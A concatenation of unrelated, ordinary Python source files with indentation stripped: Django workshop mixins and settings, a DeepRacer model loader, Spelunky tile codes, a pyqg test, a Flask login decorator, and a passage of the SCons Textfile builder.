# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def increasingBST(self, root: TreeNode) -> TreeNode:
if not root: return None
def inorder(node: TreeNode):
nonlocal curr
if node.left: inorder(node.left)
node.left = None
curr.right = node
curr = curr.right
if node.right: inorder(node.right)
result = curr = TreeNode(None)
inorder(root)
return result.right
|
py | b404299bfd91a0011c827c1801ccea0b491714a0 | from time import sleep
from zeeguu.core.model import UserActivityData
import zeeguu.core
import timeago
from datetime import datetime
import time
db_session = zeeguu.core.db.session
EVENTS_COUNT = 24
SECONDS_BETWEEN_REFRESH = 5
def most_recent_events():
return UserActivityData.query.order_by(UserActivityData.id.desc()).limit(EVENTS_COUNT)
def datetime_from_utc_to_local(utc_datetime):
now_timestamp = time.time()
offset = datetime.fromtimestamp(now_timestamp) - datetime.utcfromtimestamp(now_timestamp)
return utc_datetime + offset
def print_event(each):
now = datetime.now()
converted_time = datetime_from_utc_to_local(each.time)
tago = timeago.format(converted_time, now)
print(
f"{tago:>16} {str(converted_time):>28} {each.user.name:>20} {each.event:<30} {each.article_id} {each.value:<30} {each.extra_data}"
)
while True:
import os
db_session.commit()
os.system('cls' if os.name == 'nt' else 'clear')
# print(chr(27) + "[2J")
print(f"Most recent {EVENTS_COUNT} user activity events")
print(f"Refreshed every {SECONDS_BETWEEN_REFRESH} seconds")
for each in reversed(list(most_recent_events())):
print_event(each)
sleep(SECONDS_BETWEEN_REFRESH)
|
py | b4042afe59677704779871caac948ef9731612e0 | #!/usr/bin/python3
import sys
import re
for line in sys.stdin:
line = line.strip().lower()
words = re.findall(r'\w+', line)
#line = re.sub('[^\w\d\s\-]+', '', line)
#words = line.split()
for word in words:
print(f'{word}')
|
py | b4042b305d90c76f36043398522d900348880bdb | import gym
env = gym.make('Acrobot-v1')
print('Acrobot-v1:')
print(env.observation_space)
print(env.action_space)
env = gym.make('Pendulum-v1')
print('Pendulum-v1:')
print(env.observation_space)
print(env.action_space)
env = gym.make('CartPole-v1')
print('CartPole-v1:')
print(env.observation_space)
print(env.action_space)
env = gym.make('MountainCar-v0')
print('MountainCar-v0')
print(env.observation_space)
print(env.action_space)
'''
env.reset()
for _ in range(1000):
env.render()
env.step(env.action_space.sample()) # take a random action
env.close()
env = gym.make('Pendulum-v0')
env.reset()
for _ in range(1000):
env.render()
env.step(env.action_space.sample()) # take a random action
env.close()
'''
|
py | b4042c3bccb055e3f4b99ae52081b58ca8cac7db | from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponseForbidden
from django.http import HttpResponseRedirect, JsonResponse
from wye.base.constants import WorkshopStatus, FeedbackType
from wye.base.emailer import send_mail
from wye.organisations.models import Organisation
from wye.profiles.models import Profile
from wye.regions.models import RegionalLead
from .models import Workshop, WorkshopFeedBack
class WorkshopAccessMixin(object):
def dispatch(self, request, *args, **kwargs):
user = request.user
pk = self.kwargs.get(self.pk_url_kwarg, None)
workshop = Workshop.objects.get(id=pk)
is_admin = Profile.is_admin(user)
is_lead = (Profile.is_regional_lead(user) and
RegionalLead.is_regional_lead(user, workshop.location))
is_organiser = (Profile.is_organiser(user) and
user in workshop.requester.user.all())
if not (is_admin or is_lead or is_organiser):
return HttpResponseForbidden("Not sufficent permission")
return super(WorkshopAccessMixin, self).dispatch(request, *args, **kwargs)
class WorkshopFeedBackMixin(object):
"""
Restrict access to feedback url if
- Workshop is not completed
- If the user accessing the url is not presenter or
organiser
"""
def dispatch(self, request, *args, **kwargs):
pk = self.kwargs.get('pk')
workshop = Workshop.objects.get(id=pk)
user = self.request.user
if workshop.status != WorkshopStatus.COMPLETED:
raise Http404
if not (workshop.is_presenter(user) or workshop.is_organiser(user)):
raise PermissionDenied
return super(WorkshopFeedBackMixin, self).dispatch(request, *args, **kwargs)
class WorkshopRestrictMixin(object):
"""
Mixin to restrict
- For organisation to add workshop if no feedback is shared.
- For presenter to takeup workshop if no feedback is shared
"""
allow_presenter = False
def dispatch(self, request, *args, **kwargs):
self.user = request.user
self.feedback_required = []
# check if user is tutor
if Profile.is_presenter(self.user) and self.allow_presenter:
self.validate_presenter_feedback()
elif (Profile.is_organiser(self.user) and
Organisation.list_user_organisations(self.user).exists()):
# if user is from organisation
self.validate_organisation_feedback()
elif (Profile.is_regional_lead(self.user) or
Profile.is_admin(self.user)):
pass # don't restrict lead and admin
else:
raise PermissionDenied
if self.feedback_required:
return self.return_response(request)
return super(WorkshopRestrictMixin, self).dispatch(request, *args, **kwargs)
def validate_presenter_feedback(self):
workshops = Workshop.objects.filter(
presenter=self.user, status=WorkshopStatus.COMPLETED)
for workshop in workshops:
feedback = WorkshopFeedBack.objects.filter(
workshop=workshop, feedback_type=FeedbackType.PRESENTER
).count()
if feedback == 0:
self.feedback_required.append(workshop)
def validate_organisation_feedback(self):
workshops = Workshop.objects.filter(
requester__user=self.user, status=WorkshopStatus.COMPLETED)
for workshop in workshops:
feedback = WorkshopFeedBack.objects.filter(
workshop=workshop, feedback_type=FeedbackType.ORGANISATION
).count()
if feedback == 0:
self.feedback_required.append(workshop)
def return_response(self, request):
msg = "Please complete the feeback for %s" % (
", ".join(map(str, self.feedback_required)))
# return json for ajax request
if request.is_ajax():
return JsonResponse({"status": False, "msg": msg})
messages.error(request, msg)
return HttpResponseRedirect(reverse('workshops:workshop_list'))
class WorkshopEmailMixin(object):
def send_mail_to_presenter(self, user, context):
"""
Send email to presenter.
@param user: Is user object
@param context: Is dict of data required by email template.
"""
# Send email to presenter
return send_mail([user.email], context, self.email_dir)
def send_mail_to_group(self, context, exclude_emails=None):
"""
Send email to org/group users.
@param context: Is dict of data required by email template.
@exclude_emails: Is list of email to be excluded from
email update.
"""
if exclude_emails is None:
exclude_emails = []
# Collage POC and admin email
poc_admin_user = Profile.get_user_with_type(
user_type=['Collage POC', 'admin']
).values_list('email', flat=True)
# Org user email
org_user_emails = self.object.requester.user.filter(
is_active=True
).values_list('email', flat=True)
# all presenter if any
all_presenter_email = self.object.presenter.values_list(
'email', flat=True
)
# List of tutor who have shown interest in that location
region_interested_member = Profile.objects.filter(
interested_locations=self.object.requester.location,
usertype__slug='tutor'
).values_list('user__email', flat=True)
all_email = []
all_email.extend(org_user_emails)
all_email.extend(all_presenter_email)
all_email.extend(poc_admin_user)
all_email.extend(region_interested_member)
all_email = set(all_email)
all_email = list(all_email.difference(exclude_emails))
send_mail(all_email, context, self.email_dir)
|
py | b4042c8fd3993e7c6da544351407bfac57aae4e3 | import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', cast=bool, default=False)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# Application definition
INSTALLED_APPS = [
'account.apps.AccountConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_celery_results',
'django_celery_beat',
'rssfeed.apps.RssfeedConfig',
'feed',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rss_helper.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rss_helper.wsgi.application'
""" The sqlite3 database has been commented out below and left in in case you wish to run it locally
you can uncomment it and comment out the Postgres one underneath
"""
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_ENV_DB', default='postgres'),
'USER': config('DB_ENV_POSTGRES_USER', default='postgres'),
'PASSWORD': config('DB_ENV_POSTGRES_PASSWORD', default='postgres'),
'HOST': config('DB_PORT_5432_TCP_ADDR', default='db'),
'PORT': config('DB_PORT_5432_TCP_PORT', ''),
},
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
LOGIN_REDIRECT_URL = '/my_feeds/'
CELERY_RESULT_BACKEND = 'django-db'
CELERY_BROKER_URL = config('CELERY_BROKER_URL')
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'feed_cache',
}
}
CELERY_CACHE_BACKEND = 'django-cache'
FAIL_COUNT_THRESHOLD = config('FAIL_COUNT_THRESHOLD', default=10)
|
py | b4042d45cffea77cd1979e56ac41ead53320d90f | def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurant20to50, obj[15]: Direction_same, obj[16]: Distance
# {"feature": "Coupon", "instances": 34, "metric_value": 0.9597, "depth": 1}
if obj[3]>1:
# {"feature": "Coupon_validity", "instances": 23, "metric_value": 0.9986, "depth": 2}
if obj[4]>0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.9183, "depth": 3}
if obj[5]<=0:
# {"feature": "Time", "instances": 11, "metric_value": 0.994, "depth": 4}
if obj[2]<=3:
# {"feature": "Age", "instances": 8, "metric_value": 0.8113, "depth": 5}
if obj[6]<=3:
return 'False'
elif obj[6]>3:
# {"feature": "Education", "instances": 3, "metric_value": 0.9183, "depth": 6}
if obj[9]<=2:
return 'True'
elif obj[9]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[2]>3:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.5436, "depth": 3}
if obj[16]<=2:
return 'True'
elif obj[16]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=1:
# {"feature": "Education", "instances": 11, "metric_value": 0.4395, "depth": 2}
if obj[9]<=4:
return 'False'
elif obj[9]>4:
return 'True'
else: return 'True'
else: return 'False'
|
py | b4042e265865dbde4b45b9e88caf418580006e88 | import json
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class ModelMetadata:
def __init__(self, sensor, network, simapp_version):
self.sensor = sensor
self.network = network
self.simapp_version = simapp_version
# TODO > Action space :)
def __str__(self):
return "{} -- {} -- SIMAPP_VERSION {}".format(
self.sensor, self.network, self.simapp_version
)
def input_type(self):
# Currently only support old observation or single camera
# TODO: Check how we can do this more smart and support stereo.
input_type = None
if "observation" in self.sensor:
input_type = "observation"
elif "FRONT_FACING_CAMERA" in self.sensor:
input_type = "FRONT_FACING_CAMERA"
else:
raise Exception("Metadata contains unsupported sensor.")
return input_type
@staticmethod
def from_file(model_metadata_path: str):
"""Load a model metadata file
Args:
model_metadata_path (str): Path to the model_metadata.json file.
Raises:
Exception: If metadata cannot be loaded from the file.
Returns:
[tuple]: model sensors, network type, simapp version.
"""
try:
with open(model_metadata_path, "r") as json_file:
data = json.load(json_file)
if "version" in data:
simapp_version = data["version"]
else:
simapp_version = None
if "sensor" in data:
sensor = data["sensor"]
else:
sensor = ["observation"]
simapp_version = "1.0"
if "neural_network" in data:
network = data["neural_network"]
else:
network = "DEEP_CONVOLUTIONAL_NETWORK_SHALLOW"
return ModelMetadata(sensor, network, simapp_version)
except Exception as e:
raise Exception("Error parsing model metadata: {}".format(e))
class Model:
def __init__(self, session, metadata):
self.metadata = metadata
self.session = session
def input_size(self):
input = self.get_model_input()
height = input.shape[1]
width = input.shape[2]
return (width, height)
def get_model_input(self):
ops = self.session.graph.get_operations()
# Select first operation output tensor.
return ops[0].outputs[0]
def get_model_output(self):
ops = self.session.graph.get_operations()
# Select last operation output tensor.
return ops[-1].outputs[0]
def get_model_convolutional_output(self):
# Get all convolutional ops.
ops = self.session.graph.get_operations()
conv_ops = list(filter(lambda x: "Conv2d" in x.name, ops))
# Return last conv op.
return conv_ops[-1].outputs[0]
@staticmethod
def from_file(model_pb_path: str, metadata: ModelMetadata):
"""Load the TensorFlow graph for a model.pb model file.
Args:
pbpath (str): Path to the model.pb file
Raises:
Exception: If the session cannot be loaded from the model file.
Returns:
[tf.Session]: TensorFlow session object.
"""
try:
tf.reset_default_graph()
sess = tf.Session(
config=tf.compat.v1.ConfigProto(
allow_soft_placement=True, log_device_placement=True
)
)
with tf.io.gfile.GFile(model_pb_path, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
sess.graph.as_default()
tf.import_graph_def(graph_def, name="")
return Model(sess, metadata)
except Exception as e:
raise Exception("Could not get session for model: {}".format(e))
|
py | b4042e4329ce031cd1182b051eb035a874f06066 | import re
from dataclasses import dataclass
from collections import OrderedDict
from typing import ClassVar, Optional, TextIO
from .utils import DirectivePrefixes, split_comment, to_line, format_comment
VALID_TILE_CODES = set(
[
"alien",
"adjacent_floor",
"alien_generator",
"alienqueen",
"altar",
"ammit",
"ankh",
"anubis",
"arrow_trap",
"autowalltorch",
"babylon_floor",
"beehive_floor",
"bigspear_trap",
"bodyguard",
"bone_block",
"bunkbed",
"bush_block",
"catmummy",
"caveman",
"caveman_asleep",
"cavemanboss",
"cavemanshopkeeper",
"chain_ceiling",
"chainandblocks_ceiling",
"chair_looking_left",
"chair_looking_right",
"challenge_waitroom",
"chunk_air",
"chunk_door",
"chunk_ground",
"climbing_pole",
"clover",
"coarse_water",
"cobra",
"coffin",
"cog_floor",
"construction_sign",
"conveyorbelt_left",
"conveyorbelt_right",
"cooked_turkey",
"cookfire",
"couch",
"crate",
"crate_bombs",
"crate_parachute",
"crate_ropes",
"crocman",
"crossbow",
"crown_statue",
"crushing_elevator",
"crushtrap",
"crushtraplarge",
"cursed_pot",
"die",
"diningtable",
"dm_spawn_point",
"dog_sign",
"door",
"door_drop_held",
"door2",
"door2_secret",
"dresser",
"drill",
"duat_floor",
"eggplant_altar",
"eggplant_child",
"eggplant_door",
"elevator",
"empress_grave",
"empty",
"empty_mech",
"entrance",
"entrance_shortcut",
"excalibur_stone",
"exit",
"factory_generator",
"falling_platform",
"floor",
"floor_hard",
"forcefield",
"forcefield_top",
"fountain_drain",
"fountain_head",
"ghist_door2",
"ghist_shopkeeper",
"giant_frog",
"giant_spider",
"giantclam",
"goldbars",
"growable_climbing_pole",
"growable_vine",
"guts_floor",
"haunted_corpse",
"hermitcrab",
"honey_downwards",
"honey_upwards",
"houyibow",
"icefloor",
"idol",
"idol_floor",
"idol_hold",
"imp",
"jiangshi",
"jumpdog",
"jungle_floor",
"jungle_spear_trap",
"key",
"kingu",
"ladder",
"ladder_plat",
"lamassu",
"lamp_hang",
"landmine",
"laser_trap",
"lava",
"lavamander",
"leprechaun",
"lightarrow",
"littorch",
"litwalltorch",
"locked_door",
"lockedchest",
"madametusk",
"mantrap",
"mattock",
"merchant",
"minewood_floor",
"minewood_floor_hanging_hide",
"minewood_floor_noreplace",
"minister",
"moai_statue",
"mosquito",
"mother_statue",
"mothership_floor",
"mummy",
"mushroom_base",
"necromancer",
"nonreplaceable_babylon_floor",
"nonreplaceable_floor",
"octopus",
"oldhunter",
"olmec",
"olmecship",
"olmite",
"pagoda_floor",
"pagoda_platform",
"palace_bookcase",
"palace_candle",
"palace_chandelier",
"palace_entrance",
"palace_floor",
"palace_table",
"palace_table_tray",
"pen_floor",
"pen_locked_door",
"pillar",
"pipe",
"plasma_cannon",
"platform",
"pot",
"potofgold",
"powder_keg",
"push_block",
"quicksand",
"regenerating_block",
"robot",
"rock",
"royal_jelly",
"scorpion",
"shop_door",
"shop_item",
"shop_pagodawall",
"shop_sign",
"shop_wall",
"shop_woodwall",
"shopkeeper",
"shopkeeper_vat",
"shortcut_station_banner",
"sidetable",
"singlebed",
"sister",
"sleeping_hiredhand",
"slidingwall_ceiling",
"slidingwall_switch",
"snake",
"snap_trap",
"sorceress",
"spark_trap",
"spikes",
"spring_trap",
"stagnant_lava",
"starting_exit",
"sticky_trap",
"stone_floor",
"storage_floor",
"storage_guy",
"styled_floor",
"sunken_floor",
"surface_floor",
"surface_hidden_floor",
"telescope",
"temple_floor",
"thief",
"thinice",
"thorn_vine",
"tiamat",
"tikiman",
"timed_forcefield",
"timed_powder_keg",
"tomb_floor",
"treasure",
"treasure_chest",
"treasure_vaultchest",
"tree_base",
"turkey",
"tv",
"udjat_socket",
"ufo",
"upsidedown_spikes",
"ushabti",
"vault_wall",
"vine",
"vlad",
"vlad_floor",
"walltorch",
"wanted_poster",
"water",
"witchdoctor",
"woodenlog_trap",
"woodenlog_trap_ceiling",
"yama",
"yang",
"yeti",
"zoo_exhibit",
"cog_door", # Community tile codes -------------------------------------------------
"totem_trap", # -------#
"dustwall", # ---------#
"bat", # --------------#
"skeleton", # ---------#
"red_skeleton", # -----#
"lizard", # -----------#
"mole", # -------------#
"monkey", # -----------#
"firebug", # ----------#
"vampire", # ----------#
"osiris", # -----------#
"anubis2", # ----------#
"assassin", # ---------#
"yeti_king", # --------#
"yeti_queen", # -------#
"bee", # --------------#
"bee_queen", # --------#
"frog", # -------------#
"frog_orange", # ------#
"hundun", # -----------#
"scarab", # -----------#
"cosmic_jelly", # -----#
"ghost", # ------------#
"ghost_med_sad", # ----#
"ghost_med_happy", # --#
"ghost_small_angry", # #
"ghost_small_sad", # --#
"ghost_small_surprised", #
"ghost_small_happy", # #
"leaf", # -------------#
"udjat_key", # --------#
"tutorial_speedrun_sign", #
"tutorial_menu_sign", #
"boombox", # ----------#
"eggplant", # ---------#
"gold_bar", # ---------#
"diamond", # ----------#
"emerald", # ----------#
"sapphire", # ---------#
"ruby", # -------------#
"rope_pile", # --------#
"rope", # -------------#
"bomb_bag", # ---------#
"bomb_box", # ---------#
"giantfood", # --------#
"elixir", # -----------#
"seeded_run_unlocker", #
"specs", # ------------#
"climbing_gloves", # --#
"pitchers_mitt", # ----#
"shoes_spring", # -----#
"shoes_spike", # ------#
"paste", # ------------#
"compass", # ----------#
"compass_alien", # ----#
"parachute", # --------#
"udjat_eye", # --------#
"kapala", # -----------#
"hedjet", # -----------#
"crown", # ------------#
"eggplant_crown", # ---#
"true_crown", # -------#
"tablet", # -----------#
"bone_key", # ---------#
"playerbag", # --------#
"cape", # -------------#
"vlads_cape", # -------#
"back_jetpack", # -----#
"back_telepack", # ----#
"back_hoverpack", # ---#
"back_powerpack", # ---#
"gun_webgun", # -------#
"gun_shotgun", # ------#
"gun_freezeray", # ----#
"camera", # -----------#
"teleporter", # -------#
"boomerang", # --------#
"machete", # ----------#
"excalibur", # --------#
"excalibur_broken", # -#
"scepter", # ----------#
"clonegun", # ---------#
"shield_wooden", # ----#
"shield_metal", # -----#
"udjat_target", # -----#
"mount_rockdog", # ----#
"mount_axolotl", # ----#
"mount_qilin", # ------#
"humphead", # ---------#
"present", # ----------#
"forcefield_horizontal", #
"forcefield_horizontal_top", #
"pet_monty", # --------#
"pet_percy", # --------#
"pet_poochi", # -------#
"lion_trap", # --------#
"bomb", # -------------#
"rope_unrolled", # ----#
"cosmic_orb", # -------#
"monkey_gold", # ------#
"altar_duat", # -------#
"spikeball", # --------#
"excalibur_stone_empty", #
"cobweb", # -----------#
"eggsac", # -----------#
"eggsac_left", # --#
"eggsac_right", #
"eggsac_top", # --#
"eggsac__bottom", #
"grub", # ------------#
"spider", # ----------#
"spider_hanging", # -#
"skull_drop_trap", # -#
"lava_pot", # --------#
"proto_shopkeeper", # #
"shopkeeper_clone", # #
"tadpole", # --------#
"ghist_present", # ---#
"palace_sign", # -----#
"critter_dungbeetle", #
"critter_butterfly", ##
"critter_snail", # ---#
"critter_fish", # ----#
"critter_crab", # ----#
"critter_locust", # --#
"critter_penguin", # -#
"critter_firefly", # -#
"critter_drone", # ---#
"bubble_platform", # -#
"punishball", # --------#
"punishball_attach", # -#
"giant_fly", # --------#
"flying_fish", # ------#
"crabman", # ----------#
"spikeball_trap", # ---#
"spikeball_no_bounce", #
"slidingwall", # ------#
"boulder", # ----------#
"apep", # -------------#
"apep_left", # --------#
"apep_right", # -------#
"olmite_naked", # -----#
"olmite_helmet", # ----#
"olmite_armored", # ---#
]
)
NAME_PADDING = max(map(len, VALID_TILE_CODES)) + 4
PERCENT_DELIM = re.compile(r"%\d{1,2}%?")
class TileCodes:
def __init__(self):
self._inner = OrderedDict()
self.comment = None
def all(self):
return list(self._inner.values())
def get(self, name):
# TileCode.validate_name(name)
return self._inner.get(name)
def set_obj(self, obj: "TileCode"):
obj.validate()
self._inner[obj.name] = obj
def write(self, handle: TextIO):
handle.write(format_comment(self.comment))
for obj in self._inner.values():
handle.write(obj.to_line())
handle.write("\n")
@dataclass
class TileCode:
prefix: ClassVar[str] = DirectivePrefixes.TILE_CODE.value
name: str
value: str
comment: Optional[str]
@classmethod
def parse(cls, line: str) -> "TileCode":
rest, comment = split_comment(line)
directive, value = rest.split(None, 1)
name = directive[2:]
if not name:
raise ValueError("Directive missing name.")
obj = cls(name, value, comment)
obj.validate()
return obj
@staticmethod
def validate_name(name: str):
for part in PERCENT_DELIM.split(name):
# names can have foo%50 where an empty rightside is valid.
if not part:
continue
if part not in VALID_TILE_CODES:
raise ValueError(f"Name {name!r} isn't a valid tile code.")
def validate_value(self):
if len(self.value) != 1:
raise ValueError(
f"Tilecode {self.name!r} has value {self.value!r} that's more than one character."
)
def validate(self):
# self.validate_name(self.name)
self.validate_value()
def to_line(self) -> str:
return to_line(
self.prefix, self.name, NAME_PADDING, self.value, 4, self.comment
)
def write(self, handle: TextIO):
handle.write(self.to_line())
|
py | b4042ea8df4850fc877ee85f8964893b5a1de84c | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ringapp', '0023_auto_20150121_1925'),
]
operations = [
migrations.RenameField(
model_name='ring',
old_name='reference',
new_name='old_reference',
),
migrations.AddField(
model_name='property',
name='comm_version',
field=models.ForeignKey(blank=True, to='ringapp.CommProperty', null=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AlterField(
model_name='ring',
name='kwds',
field=models.CharField(max_length=200, null=True, blank=True),
preserve_default=True,
),
]
|
py | b4042f421c43e22bbe1b2eeb9a71ac980bce03d5 | # Generated by Django 2.1.15 on 2020-11-27 05:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b4042f6faa9e831e7bd640631f87e98fdc3c6538 | from __future__ import print_function
import numpy as np
import pyqg
def test_advect(rtol=1.e-13):
""" Make sure advective term vanishes for plane wave
It is an unpleasant fact that we cannot to get
a double precision accuracy when the plane wave is
slanted (kx != 0 and ky !=0 ) """
#m = bt_model.BTModel(L=2.*np.pi,nx=256)
m = pyqg.QGModel(L=2.*np.pi,nx=256,U1=0)
# there are some magic combinations that
# fails the test...try kx=12,ky=24
# should investigate what's going on...
kx = np.array([1.,5.,10.,0.,24.,2.])
ky = np.array([2.,0.,10.,21.,12.,49.])
for i in range(kx.size):
# set plane wave PV
#m.set_q(
# np.cos( kx[i] * m.x + ky[i] * m.y ))
m.set_q1q2(
np.cos( kx[i] * m.x + ky[i] * m.y ),
np.zeros_like(m.x) )
# compute psi
m._invert()
#m.ph1,m.ph2 = m.invph(m.qh1,m.qh2)
# diagnose vel.
#m.u1,m.v1 = m.caluv(m.ph1)
# compute advection
#jacobh = m.advect(m.q[0],m.u[0],m.v[0])
jacobh = m._advect(m.q,m.u,m.v)
#jacobh = m.advect(m.q,m.u,m.v)
jacob = m.ifft(jacobh)
# residual -- the L2-norm of the jacobian
res = np.abs(jacob).sum()*m.dx*m.dy/(m.L**2)
print("residual = %1.5e" %res)
assert res<rtol, " *** Jacobian residual is larger than %1.1e" %rtol
if __name__ == "__main__":
test_advect()
|
py | b404301e13efbd13f7022749d684ff6f5f26971c | from functools import wraps
from flask import redirect, url_for, session
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'credentials' not in session:
return redirect(url_for('login'))
return f(*args, **kwargs)
return decorated_function
|
py | b404304aca874b88c5e4d13c7f0ee3cdfc18787a | # -*- python -*-
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__doc__ = """
Textfile/Substfile builder for SCons.
Create file 'target' which typically is a textfile. The 'source'
may be any combination of strings, Nodes, or lists of same. A
'linesep' will be put between any part written and defaults to
os.linesep.
The only difference between the Textfile builder and the Substfile
builder is that strings are converted to Value() nodes for the
former and File() nodes for the latter. To insert files in the
former or strings in the latter, wrap them in a File() or Value(),
respectively.
The values of SUBST_DICT first have any construction variables
expanded (its keys are not expanded). If a value of SUBST_DICT is
a python callable function, it is called and the result is expanded
as the value. Values are substituted in a "random" order; if any
substitution could be further expanded by another substitution, it
is unpredictable whether the expansion will occur.
"""
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import SCons
import os
import re
from SCons.Node import Node
from SCons.Node.Python import Value
from SCons.Util import is_String, is_Sequence, is_Dict, to_bytes
TEXTFILE_FILE_WRITE_MODE = 'w'
LINESEP = '\n'
def _do_subst(node, subs):
"""
Fetch the node contents and replace all instances of the keys with
their values. For example, if subs is
{'%VERSION%': '1.2345', '%BASE%': 'MyProg', '%prefix%': '/bin'},
then all instances of %VERSION% in the file will be replaced with
1.2345 and so forth.
"""
contents = node.get_text_contents()
if subs:
for (k, val) in subs:
contents = contents.replace(k, val)
if 'b' in TEXTFILE_FILE_WRITE_MODE:
try:
contents = bytearray(contents, 'utf-8')
except UnicodeDecodeError:
# contents is already utf-8 encoded python 2 str i.e. a byte array
contents = bytearray(contents)
return contents
def _action(target, source, env):
# prepare the line separator
linesep = env['LINESEPARATOR']
if linesep is None:
linesep = LINESEP # os.linesep
elif is_String(linesep):
pass
elif isinstance(linesep, Value):
linesep = linesep.get_text_contents()
else:
raise SCons.Errors.UserError('unexpected type/class for LINESEPARATOR: %s'
% repr(linesep), None)
if 'b' in TEXTFILE_FILE_WRITE_MODE:
linesep = to_bytes(linesep)
# create a dictionary to use for the substitutions
if 'SUBST_DICT' not in env:
subs = None # no substitutions
else:
subst_dict = env['SUBST_DICT']
if is_Dict(subst_dict):
subst_dict = list(subst_dict.items())
elif is_Sequence(subst_dict):
pass
else:
raise SCons.Errors.UserError('SUBST_DICT must be dict or sequence')
subs = []
for (k, value) in subst_dict:
if callable(value):
value = value()
if is_String(value):
value = env.subst(value)
else:
value = str(value)
subs.append((k, value))
# write the file
try:
target_file = open(target[0].get_path(), TEXTFILE_FILE_WRITE_MODE, newline='')
except (OSError, IOError):
raise SCons.Errors.UserError("Can't write target file %s" % target[0])
# separate lines by 'linesep' only if linesep is not empty
lsep = None
for line in source:
if lsep:
target_file.write(lsep)
target_file.write(_do_subst(line, subs))
lsep = linesep
target_file.close()
def _strfunc(target, source, env):
return "Creating '%s'" % target[0]
def _convert_list_R(newlist, sources):
for elem in sources:
if is_Sequence(elem):
_convert_list_R(newlist, elem)
elif isinstance(elem, Node):
newlist.append(elem)
else:
newlist.append(Value(elem))
def _convert_list(target, source, env):
if len(target) != 1:
raise SCons.Errors.UserError("Only one target file allowed")
newlist = []
